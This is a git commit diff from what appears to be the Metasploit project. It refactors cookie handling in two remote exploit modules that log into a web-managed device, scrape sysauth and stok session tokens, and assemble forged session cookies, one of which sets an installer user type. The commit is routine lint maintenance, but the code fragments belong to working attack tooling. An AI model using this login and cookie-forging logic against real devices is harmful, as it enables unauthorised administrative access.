Fix msftidy warnings wrt Set-Cookie
parent
85350a9645
commit
7b386ea2c8
|
@ -127,15 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
)
|
||||
|
||||
cookies = res.get_cookies
|
||||
good_response = (
|
||||
res &&
|
||||
res.code == 200 &&
|
||||
res.headers.include?('Set-Cookie') &&
|
||||
res.headers['Set-Cookie'].include?('sysauth')
|
||||
cookies.include?('sysauth')
|
||||
)
|
||||
|
||||
if good_response
|
||||
sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
|
||||
sysauth_value = cookies.match(/((.*)[$ ])/)
|
||||
cookie1 = "#{sysauth_value}"
|
||||
prevsessid = res.body.match(/((?:[a-z][a-z]*[0-9]+[a-z0-9]*))/)
|
||||
|
||||
|
@ -158,10 +158,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
)
|
||||
|
||||
cookies = res.get_cookies
|
||||
good_response = (
|
||||
res &&
|
||||
res.code == 200 &&
|
||||
res.headers.include?('Set-Cookie') &&
|
||||
!cookies.blank? &&
|
||||
!res.body.include?('auth_failed') &&
|
||||
!res.body.include?('Maximum number of users reached.')
|
||||
)
|
||||
|
@ -170,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
|
||||
|
||||
# get the cookie now
|
||||
sysauth_value_2 = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
|
||||
sysauth_value_2 = cookies.match(/((.*)[$ ])/)
|
||||
stok_value_2_dirty = res.body.match(/"stok": "(.*?)"/)
|
||||
stok_value_2 = "#{stok_value_2_dirty}".split('"')[3]
|
||||
final_cookie = "#{sysauth_value_2}" + 'usernameType_80=admin; stok_80=' + "#{stok_value_2}"
|
||||
|
|
|
@ -127,15 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
)
|
||||
|
||||
cookies = res.get_cookies
|
||||
good_response = (
|
||||
res &&
|
||||
res.code == 200 &&
|
||||
res.headers.include?('Set-Cookie') &&
|
||||
res.headers['Set-Cookie'].include?('sysauth')
|
||||
cookies.include?('sysauth')
|
||||
)
|
||||
|
||||
if good_response
|
||||
sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
|
||||
sysauth_value = cookies.match(/((.*)[$ ])/)
|
||||
|
||||
cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
|
||||
|
||||
|
@ -157,11 +157,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
)
|
||||
|
||||
cookies = res.get_cookies
|
||||
good_response = (
|
||||
res &&
|
||||
res.code == 200 &&
|
||||
res.headers.include?('Set-Cookie') &&
|
||||
res.headers['Set-Cookie'].include?('stok=') &&
|
||||
cookies.include?('stok=') &&
|
||||
!res.body.include?('Maximum number of users reached.')
|
||||
)
|
||||
|
||||
|
@ -169,9 +169,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
|
||||
|
||||
# get the cookie now
|
||||
get_stok = res.headers['Set-Cookie'].match(/stok=(.*)/)
|
||||
get_stok = cookies.match(/stok=(.*)/)
|
||||
stok_value = get_stok[1]
|
||||
sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
|
||||
sysauth_value = cookies.match(/((.*)[$ ])/)
|
||||
final_cookie = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"
|
||||
|
||||
# create config_uri
|
||||
|
|
Loading…
Reference in New Issue